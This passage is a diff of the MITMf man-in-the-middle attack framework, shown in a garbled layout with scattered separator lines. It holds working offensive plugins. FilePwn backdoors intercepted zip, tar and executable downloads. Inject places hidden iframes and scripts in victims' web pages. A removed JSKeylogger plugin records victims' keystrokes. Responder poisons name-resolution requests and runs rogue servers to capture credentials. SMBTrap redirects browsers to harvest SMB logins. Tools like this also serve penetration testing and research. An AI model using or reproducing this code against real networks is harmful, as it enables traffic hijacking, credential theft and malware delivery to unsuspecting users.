tmpDir = '/tmp/' + tmpRan
|
|
||||||
tmpFile = '/tmp/' + tmpRan + '.zip'
|
|
||||||
|
|
||||||
os.mkdir(tmpDir)
|
|
||||||
|
|
||||||
with open(tmpFile, 'w') as f:
|
|
||||||
f.write(aZipFile)
|
|
||||||
|
|
||||||
zippyfile = zipfile.ZipFile(tmpFile, 'r')
|
|
||||||
|
|
||||||
#encryption test
|
|
||||||
try:
|
|
||||||
zippyfile.testzip()
|
|
||||||
|
|
||||||
except RuntimeError as e:
|
|
||||||
if 'encrypted' in str(e):
|
|
||||||
mitmf_logger.info('Encrypted zipfile found. Not patching.')
|
|
||||||
return aZipFile
|
|
||||||
|
|
||||||
print "[*] ZipFile contents and info:"
|
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
|
||||||
print "\t", info.filename, info.date_time, info.file_size
|
|
||||||
|
|
||||||
zippyfile.extractall(tmpDir)
|
|
||||||
|
|
||||||
patchCount = 0
|
|
||||||
|
|
||||||
wasPatched = False
|
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
|
||||||
print "[*] >>> Next file in zipfile:", info.filename
|
|
||||||
|
|
||||||
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
|
||||||
print info.filename, 'is a directory'
|
|
||||||
continue
|
|
||||||
|
|
||||||
#Check against keywords
|
|
||||||
keywordCheck = False
|
|
||||||
|
|
||||||
if type(self.zipblacklist) is str:
|
|
||||||
if self.zipblacklist.lower() in info.filename.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
|
|
||||||
else:
|
|
||||||
for keyword in self.zipblacklist:
|
|
||||||
if keyword.lower() in info.filename.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
continue
|
|
||||||
|
|
||||||
if keywordCheck is True:
|
|
||||||
print "[!] Zip blacklist enforced!"
|
|
||||||
mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
|
|
||||||
continue
|
|
||||||
|
|
||||||
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
|
||||||
|
|
||||||
if patchResult:
|
|
||||||
patchCount += 1
|
|
||||||
file2 = "backdoored/" + os.path.basename(info.filename)
|
|
||||||
print "[*] Patching complete, adding to zip file."
|
|
||||||
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
|
||||||
mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
|
|
||||||
os.remove(file2)
|
|
||||||
wasPatched = True
|
|
||||||
else:
|
|
||||||
print "[!] Patching failed"
|
|
||||||
mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
|
|
||||||
|
|
||||||
print '-' * 10
|
|
||||||
|
|
||||||
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
|
||||||
mitmf_logger.info("Met Zip config patchCount limit.")
|
|
||||||
break
|
|
||||||
|
|
||||||
zippyfile.close()
|
|
||||||
|
|
||||||
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
|
||||||
|
|
||||||
print "[*] Writing to zipfile:", tmpFile
|
|
||||||
|
|
||||||
for base, dirs, files in os.walk(tmpDir):
|
|
||||||
for afile in files:
|
|
||||||
filename = os.path.join(base, afile)
|
|
||||||
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
|
|
||||||
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
|
||||||
|
|
||||||
zipResult.close()
|
|
||||||
#clean up
|
|
||||||
shutil.rmtree(tmpDir)
|
|
||||||
|
|
||||||
with open(tmpFile, 'rb') as f:
|
|
||||||
tempZipFile = f.read()
|
|
||||||
os.remove(tmpFile)
|
|
||||||
|
|
||||||
if wasPatched is False:
|
|
||||||
print "[*] No files were patched forwarding original file"
|
|
||||||
self.patched.put(aZipFile)
|
|
||||||
return
|
|
||||||
else:
|
|
||||||
self.patched.put(tempZipFile)
|
|
||||||
return
|
|
||||||
|
|
||||||
def serverResponse(self, response, request, data):
|
|
||||||
|
|
||||||
content_header = response.headers['Content-Type']
|
|
||||||
client_ip = response.getClientIP()
|
|
||||||
|
|
||||||
if content_header in self.zipMimeTypes:
|
|
||||||
|
|
||||||
if self.bytes_have_format(data, 'zip'):
|
|
||||||
mitmf_logger.info("[FilePwn] {} Detected supported zip file type!".format(client_ip))
|
|
||||||
|
|
||||||
process = multiprocessing.Process(name='zip', target=self.zip_files, args=(data,))
|
|
||||||
process.daemon = True
|
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
bd_zip = self.patched.get()
|
|
||||||
|
|
||||||
if bd_zip:
|
|
||||||
mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
|
|
||||||
return {'response': response, 'request': request, 'data': bd_zip}
|
|
||||||
|
|
||||||
else:
|
|
||||||
for tartype in ['gz','bz','tar']:
|
|
||||||
if self.bytes_have_format(data, tartype):
|
|
||||||
mitmf_logger.info("[FilePwn] {} Detected supported tar file type!".format(client_ip))
|
|
||||||
|
|
||||||
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
|
|
||||||
process.daemon = True
|
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
bd_tar = self.patched.get()
|
|
||||||
|
|
||||||
if bd_tar:
|
|
||||||
mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
|
|
||||||
return {'response': response, 'request': request, 'data': bd_tar}
|
|
||||||
|
|
||||||
|
|
||||||
elif content_header in self.binaryMimeTypes:
|
|
||||||
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
|
||||||
if self.bytes_have_format(data, bintype):
|
|
||||||
mitmf_logger.info("[FilePwn] {} Detected supported binary type ({})!".format(client_ip, bintype))
|
|
||||||
fd, tmpFile = mkstemp()
|
|
||||||
with open(tmpFile, 'w') as f:
|
|
||||||
f.write(data)
|
|
||||||
|
|
||||||
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
|
|
||||||
process.daemon = True
|
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
patchb = self.patched.get()
|
|
||||||
|
|
||||||
if patchb:
|
|
||||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
|
||||||
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
|
||||||
mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
|
|
||||||
return {'response': response, 'request': request, 'data': bd_binary}
|
|
||||||
|
|
||||||
mitmf_logger.debug("[FilePwn] {} File is not of supported Content-Type: {}".format(client_ip, content_header))
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
#
|
#
|
||||||
# This program is free software; you can redistribute it and/or
|
# This program is free software; you can redistribute it and/or
|
||||||
|
@ -18,31 +16,31 @@
|
||||||
# USA
|
# USA
|
||||||
#
|
#
|
||||||
|
|
||||||
import logging
|
|
||||||
import time
|
import time
|
||||||
import re
|
import re
|
||||||
import sys
|
import sys
|
||||||
import argparse
|
import argparse
|
||||||
|
|
||||||
from core.utils import SystemConfig
|
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from plugins.CacheKill import CacheKill
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
class Inject(Plugin):
|
||||||
|
|
||||||
class Inject(CacheKill, Plugin):
|
|
||||||
name = "Inject"
|
name = "Inject"
|
||||||
optname = "inject"
|
optname = "inject"
|
||||||
desc = "Inject arbitrary content into HTML content"
|
desc = "Inject arbitrary content into HTML content"
|
||||||
version = "0.3"
|
version = "0.4"
|
||||||
has_opts = True
|
|
||||||
|
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
self.options = options
|
self.options = options
|
||||||
self.our_ip = SystemConfig.getIP(options.interface)
|
self.ip = options.ip
|
||||||
self.html_src = options.html_url
|
|
||||||
self.js_src = options.js_url
|
self.html_url = options.html_url
|
||||||
|
self.html_payload = options.html_payload
|
||||||
|
self.html_file = options.html_file
|
||||||
|
self.js_url = options.js_url
|
||||||
|
self.js_payload = options.js_payload
|
||||||
|
self.js_file = options.js_file
|
||||||
|
|
||||||
self.rate_limit = options.rate_limit
|
self.rate_limit = options.rate_limit
|
||||||
self.count_limit = options.count_limit
|
self.count_limit = options.count_limit
|
||||||
self.per_domain = options.per_domain
|
self.per_domain = options.per_domain
|
||||||
|
@ -50,33 +48,47 @@ class Inject(CacheKill, Plugin):
|
||||||
self.white_ips = options.white_ips.split(',')
|
self.white_ips = options.white_ips.split(',')
|
||||||
self.white_domains = options.white_domains.split(',')
|
self.white_domains = options.white_domains.split(',')
|
||||||
self.black_domains = options.black_domains.split(',')
|
self.black_domains = options.black_domains.split(',')
|
||||||
self.match_str = "</body>" or options.match_str
|
self.match_str = options.match_str
|
||||||
self.html_payload = options.html_payload
|
|
||||||
self.ctable = {}
|
self.ctable = {}
|
||||||
self.dtable = {}
|
self.dtable = {}
|
||||||
self.count = 0
|
self.count = 0
|
||||||
self.mime = "text/html"
|
self.mime = "text/html"
|
||||||
|
|
||||||
if not options.preserve_cache:
|
def response(self, response, request, data):
|
||||||
CacheKill.initialize(self, options)
|
|
||||||
|
|
||||||
def serverResponse(self, response, request, data):
|
|
||||||
#We throttle to only inject once every two seconds per client
|
|
||||||
#If you have MSF on another host, you may need to check prior to injection
|
|
||||||
#print "http://" + response.client.getRequestHostname() + response.uri
|
|
||||||
ip, hn, mime = self._get_req_info(response)
|
ip, hn, mime = self._get_req_info(response)
|
||||||
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.our_ip):
|
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.ip):
|
||||||
if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
|
if (not self.js_url == self.html_url is not None or not self.html_payload == ""):
|
||||||
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
|
data = self._insert_html(data, post=[(self.match_str, self.get_payload())])
|
||||||
self.ctable[ip] = time.time()
|
self.ctable[ip] = time.time()
|
||||||
self.dtable[ip+hn] = True
|
self.dtable[ip+hn] = True
|
||||||
self.count += 1
|
self.count += 1
|
||||||
mitmf_logger.info("{} [{}] Injected malicious html: {}".format(ip, self.name, hn))
|
self.clientlog.info("Injected malicious html: {}".format(hn), extra=request.clientInfo)
|
||||||
|
|
||||||
return {'response': response, 'request':request, 'data': data}
|
return {'response': response, 'request':request, 'data': data}
|
||||||
|
|
||||||
def _get_payload(self):
|
def get_payload(self):
|
||||||
return self._get_js() + self._get_iframe() + self.html_payload
|
payload = ''
|
||||||
|
|
||||||
|
if self.html_url is not None:
|
||||||
|
payload += '<iframe src="{}" height=0%% width=0%%></iframe>'.format(self.html_url)
|
||||||
|
|
||||||
|
if self.html_payload is not None:
|
||||||
|
payload += self.html_payload
|
||||||
|
|
||||||
|
if self.html_file:
|
||||||
|
payload += self.html_file.read()
|
||||||
|
|
||||||
|
if self.js_url is not None:
|
||||||
|
payload += '<script type="text/javascript" src="{}"></script>'.format(self.js_url)
|
||||||
|
|
||||||
|
if self.js_payload is not None:
|
||||||
|
payload += '<script type="text/javascript">{}</script>'.format(self.js_payload)
|
||||||
|
|
||||||
|
if self.js_file:
|
||||||
|
payload += '<script type="text/javascript">{}</script>'.format(self.js_file.read())
|
||||||
|
|
||||||
|
return payload
|
||||||
|
|
||||||
def _ip_filter(self, ip):
|
def _ip_filter(self, ip):
|
||||||
|
|
||||||
|
@ -134,16 +146,6 @@ class Inject(CacheKill, Plugin):
|
||||||
mime = response.headers['Content-Type']
|
mime = response.headers['Content-Type']
|
||||||
return (ip, hn, mime)
|
return (ip, hn, mime)
|
||||||
|
|
||||||
def _get_iframe(self):
|
|
||||||
if self.html_src is not None:
|
|
||||||
return '<iframe src="%s" height=0%% width=0%%></iframe>' % (self.html_src)
|
|
||||||
return ''
|
|
||||||
|
|
||||||
def _get_js(self):
|
|
||||||
if self.js_src is not None:
|
|
||||||
return '<script type="text/javascript" src="%s"></script>' % (self.js_src)
|
|
||||||
return ''
|
|
||||||
|
|
||||||
def _insert_html(self, data, pre=[], post=[], re_flags=re.I):
|
def _insert_html(self, data, pre=[], post=[], re_flags=re.I):
|
||||||
'''
|
'''
|
||||||
To use this function, simply pass a list of tuples of the form:
|
To use this function, simply pass a list of tuples of the form:
|
||||||
|
@ -166,18 +168,20 @@ class Inject(CacheKill, Plugin):
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
def pluginOptions(self, options):
|
def options(self, options):
|
||||||
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
|
options.add_argument("--js-url", type=str, help="URL of the JS to inject")
|
||||||
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
|
options.add_argument('--js-payload', type=str, help='JS string to inject')
|
||||||
options.add_argument("--html-payload", type=str, default='', help="String you would like to inject.")
|
options.add_argument('--js-file', type=argparse.FileType('r'), help='File containing JS to inject')
|
||||||
#options.add_argument("--html-file", type=argparse.FileType('r'), help='File containg HTML you would like to inject')
|
options.add_argument("--html-url", type=str, help="URL of the HTML to inject")
|
||||||
options.add_argument("--match-str", type=str, default=None, help="String you would like to match and place your payload before. (</body> by default)")
|
options.add_argument("--html-payload", type=str, help="HTML string to inject")
|
||||||
options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
|
options.add_argument('--html-file', type=argparse.FileType('r'), help='File containing HTML to inject')
|
||||||
|
options.add_argument("--match-str", type=str, default='</body>', help="String you would like to match and place your payload before. (</body> by default)")
|
||||||
|
|
||||||
group = options.add_mutually_exclusive_group(required=False)
|
group = options.add_mutually_exclusive_group(required=False)
|
||||||
group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
|
group.add_argument("--per-domain", action="store_true", help="Inject once per domain per client.")
|
||||||
group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
|
group.add_argument("--rate-limit", type=float, help="Inject once every RATE_LIMIT seconds per client.")
|
||||||
group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
|
group.add_argument("--count-limit", type=int, help="Inject only COUNT_LIMIT times per client.")
|
||||||
group.add_argument("--white-ips", metavar='IPS', type=str, default='', help="Inject content ONLY for these ips (comma seperated)")
|
group.add_argument("--white-ips", metavar='IP', default='', type=str, help="Inject content ONLY for these ips (comma seperated)")
|
||||||
group.add_argument("--black-ips", metavar='IPS', type=str, default='', help="DO NOT inject content for these ips (comma seperated)")
|
group.add_argument("--black-ips", metavar='IP', default='', type=str, help="DO NOT inject content for these ips (comma seperated)")
|
||||||
group.add_argument("--white-domains", metavar='DOMAINS', type=str, default='', help="Inject content ONLY for these domains (comma seperated)")
|
group.add_argument("--white-domains", metavar='DOMAINS', default='', type=str, help="Inject content ONLY for these domains (comma seperated)")
|
||||||
group.add_argument("--black-domains", metavar='DOMAINS', type=str, default='', help="DO NOT inject content for these domains (comma seperated)")
|
group.add_argument("--black-domains", metavar='DOMAINS', default='', type=str, help="DO NOT inject content for these domains (comma seperated)")
|
||||||
|
|
|
@ -1,71 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
import logging
|
|
||||||
import re
|
|
||||||
import random
|
|
||||||
import string
|
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.Inject import Inject
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class jskeylogger(Inject, Plugin):
|
|
||||||
name = "JSKeylogger"
|
|
||||||
optname = "jskeylogger"
|
|
||||||
desc = "Injects a javascript keylogger into clients webpages"
|
|
||||||
version = "0.2"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
Inject.initialize(self, options)
|
|
||||||
self.html_payload = self.msf_keylogger()
|
|
||||||
|
|
||||||
def clientRequest(self, request):
|
|
||||||
if 'keylog' in request.uri:
|
|
||||||
request.printPostData = False
|
|
||||||
|
|
||||||
raw_keys = request.postData.split("&&")[0]
|
|
||||||
input_field = request.postData.split("&&")[1]
|
|
||||||
|
|
||||||
keys = raw_keys.split(",")
|
|
||||||
if keys:
|
|
||||||
del keys[0]; del(keys[len(keys)-1])
|
|
||||||
|
|
||||||
nice = ''
|
|
||||||
for n in keys:
|
|
||||||
if n == '9':
|
|
||||||
nice += "<TAB>"
|
|
||||||
elif n == '8':
|
|
||||||
nice = nice[:-1]
|
|
||||||
elif n == '13':
|
|
||||||
nice = ''
|
|
||||||
else:
|
|
||||||
try:
|
|
||||||
nice += n.decode('hex')
|
|
||||||
except:
|
|
||||||
mitmf_logger.error("{} [JSKeylogger] Error decoding char: {}".format(request.client.getClientIP(), n))
|
|
||||||
|
|
||||||
mitmf_logger.info("{} [JSKeylogger] Host: {} | Field: {} | Keys: {}".format(request.client.getClientIP(), request.headers['host'], input_field, nice))
|
|
||||||
|
|
||||||
def msf_keylogger(self):
|
|
||||||
keylogger = open("./core/javascript/msfkeylogger.js", "r").read()
|
|
||||||
|
|
||||||
return '<script type="text/javascript">\n' + keylogger + '\n</script>'
|
|
|
@ -1,80 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
"""
|
|
||||||
|
|
||||||
Plugin by @rubenthijssen
|
|
||||||
|
|
||||||
"""
|
|
||||||
|
|
||||||
import sys
|
|
||||||
import logging
|
|
||||||
import time
|
|
||||||
import re
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.CacheKill import CacheKill
|
|
||||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class Replace(Plugin):
|
|
||||||
name = "Replace"
|
|
||||||
optname = "replace"
|
|
||||||
desc = "Replace arbitrary content in HTML content"
|
|
||||||
version = "0.2"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
|
|
||||||
self.ctable = {}
|
|
||||||
self.dtable = {}
|
|
||||||
self.mime = "text/html"
|
|
||||||
|
|
||||||
def serverResponse(self, response, request, data):
|
|
||||||
ip, hn, mime = self._get_req_info(response)
|
|
||||||
|
|
||||||
if self._should_replace(ip, hn, mime):
|
|
||||||
|
|
||||||
# Did the user provide us with a regex file?
|
|
||||||
for rulename, regexs in self.config['Replace'].iteritems():
|
|
||||||
for regex1,regex2 in regexs.iteritems():
|
|
||||||
if re.search(regex1, data):
|
|
||||||
try:
|
|
||||||
data = re.sub(regex1, regex2, data)
|
|
||||||
|
|
||||||
mitmf_logger.info("{} [{}] Host: {} Occurances matching '{}' replaced with '{}' according to rule '{}'".format(ip, self.name, hn, regex1, regex2, rulename))
|
|
||||||
except Exception:
|
|
||||||
mitmf_logger.error("{} [{}] Your provided regex ({}) or replace value ({}) is empty or invalid. Please debug your provided regex(es) in rule '{}'" % (ip, hn, regex1, regex2, rulename))
|
|
||||||
|
|
||||||
self.ctable[ip] = time.time()
|
|
||||||
self.dtable[ip+hn] = True
|
|
||||||
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
||||||
|
|
||||||
def _should_replace(self, ip, hn, mime):
|
|
||||||
return mime.find(self.mime) != -1
|
|
||||||
|
|
||||||
def _get_req_info(self, response):
|
|
||||||
ip = response.getClientIP()
|
|
||||||
hn = response.getRequestHostname()
|
|
||||||
mime = response.headers['Content-Type']
|
|
||||||
|
|
||||||
return (ip, hn, mime)
|
|
|
@ -1,128 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from twisted.internet import reactor
|
|
||||||
from core.utils import SystemConfig, shutdown
|
|
||||||
|
|
||||||
from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
|
|
||||||
from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
|
|
||||||
from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner
|
|
||||||
from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter
|
|
||||||
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
|
||||||
|
|
||||||
class Responder(Plugin):
|
|
||||||
name = "Responder"
|
|
||||||
optname = "responder"
|
|
||||||
desc = "Poison LLMNR, NBT-NS and MDNS requests"
|
|
||||||
tree_info = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"]
|
|
||||||
version = "0.2"
|
|
||||||
has_opts = True
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
|
||||||
self.options = options
|
|
||||||
self.interface = options.interface
|
|
||||||
self.ourip = SystemConfig.getIP(options.interface)
|
|
||||||
|
|
||||||
try:
|
|
||||||
config = self.config['Responder']
|
|
||||||
smbChal = self.config['MITMf']['SMB']['Challenge']
|
|
||||||
except Exception as e:
|
|
||||||
shutdown('[-] Error parsing config for Responder: ' + str(e))
|
|
||||||
|
|
||||||
LANFingerprinter().start(options)
|
|
||||||
MDNSPoisoner().start(options, self.ourip)
|
|
||||||
NBTNSPoisoner().start(options, self.ourip)
|
|
||||||
LLMNRPoisoner().start(options, self.ourip)
|
|
||||||
|
|
||||||
if options.wpad:
|
|
||||||
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
|
||||||
WPADPoisoner().start(options)
|
|
||||||
|
|
||||||
if self.config["Responder"]["MSSQL"].lower() == "on":
|
|
||||||
from core.responder.mssql.MSSQLServer import MSSQLServer
|
|
||||||
MSSQLServer().start(smbChal)
|
|
||||||
|
|
||||||
if self.config["Responder"]["Kerberos"].lower() == "on":
|
|
||||||
from core.responder.kerberos.KERBServer import KERBServer
|
|
||||||
KERBServer().start()
|
|
||||||
|
|
||||||
if self.config["Responder"]["FTP"].lower() == "on":
|
|
||||||
from core.responder.ftp.FTPServer import FTPServer
|
|
||||||
FTPServer().start()
|
|
||||||
|
|
||||||
if self.config["Responder"]["POP"].lower() == "on":
|
|
||||||
from core.responder.pop3.POP3Server import POP3Server
|
|
||||||
POP3Server().start()
|
|
||||||
|
|
||||||
if self.config["Responder"]["SMTP"].lower() == "on":
|
|
||||||
from core.responder.smtp.SMTPServer import SMTPServer
|
|
||||||
SMTPServer().start()
|
|
||||||
|
|
||||||
if self.config["Responder"]["IMAP"].lower() == "on":
|
|
||||||
from core.responder.imap.IMAPServer import IMAPServer
|
|
||||||
IMAPServer().start()
|
|
||||||
|
|
||||||
if self.config["Responder"]["LDAP"].lower() == "on":
|
|
||||||
from core.responder.ldap.LDAPServer import LDAPServer
|
|
||||||
LDAPServer().start(smbChal)
|
|
||||||
|
|
||||||
if options.analyze:
|
|
||||||
self.tree_info.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
|
|
||||||
self.IsICMPRedirectPlausible(self.ourip)
|
|
||||||
|
|
||||||
def IsICMPRedirectPlausible(self, IP):
|
|
||||||
result = []
|
|
||||||
dnsip = []
|
|
||||||
for line in file('/etc/resolv.conf', 'r'):
|
|
||||||
ip = line.split()
|
|
||||||
if len(ip) < 2:
|
|
||||||
continue
|
|
||||||
if ip[0] == 'nameserver':
|
|
||||||
dnsip.extend(ip[1:])
|
|
||||||
|
|
||||||
for x in dnsip:
|
|
||||||
if x !="127.0.0.1" and self.IsOnTheSameSubnet(x,IP) == False:
|
|
||||||
self.tree_info.append("You can ICMP Redirect on this network. This workstation ({}) is not on the same subnet than the DNS server ({})".format(IP, x))
|
|
||||||
else:
|
|
||||||
pass
|
|
||||||
|
|
||||||
def IsOnTheSameSubnet(self, ip, net):
|
|
||||||
net = net+'/24'
|
|
||||||
ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
|
|
||||||
netstr, bits = net.split('/')
|
|
||||||
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
|
|
||||||
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
|
|
||||||
return (ipaddr & mask) == (netaddr & mask)
|
|
||||||
|
|
||||||
def pluginReactor(self, strippingFactory):
|
|
||||||
reactor.listenTCP(3141, strippingFactory)
|
|
||||||
|
|
||||||
def pluginOptions(self, options):
|
|
||||||
options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
|
|
||||||
options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Enables answers for netbios wredir suffix queries")
|
|
||||||
options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Enables answers for netbios domain suffix queries")
|
|
||||||
options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "Fingerprint hosts that issued an NBT-NS or LLMNR query")
|
|
||||||
options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
|
|
||||||
options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Start the WPAD rogue proxy server")
|
|
||||||
# Removed these options until I find a better way of implementing them
|
|
||||||
#options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
|
|
||||||
#options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
|
|
@ -1,24 +0,0 @@
|
||||||
import logging
|
|
||||||
import random
|
|
||||||
import string
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from core.utils import SystemConfig
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class SMBTrap(Plugin):
|
|
||||||
name = "SMBTrap"
|
|
||||||
optname = "smbtrap"
|
|
||||||
desc = "Exploits the SMBTrap vulnerability on connected clients"
|
|
||||||
version = "1.0"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.ourip = SystemConfig.getIP(options.interface)
|
|
||||||
|
|
||||||
def serverResponseStatus(self, request, version, code, message):
|
|
||||||
return {"request": request, "version": version, "code": 302, "message": "Found"}
|
|
||||||
|
|
||||||
def serverHeaders(self, response, request):
|
|
||||||
mitmf_logger.info("{} [SMBTrap] Trapping request to {}".format(request.client.getClientIP(), request.headers['host']))
|
|
||||||
response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8)))
|
|
|
@ -1,51 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
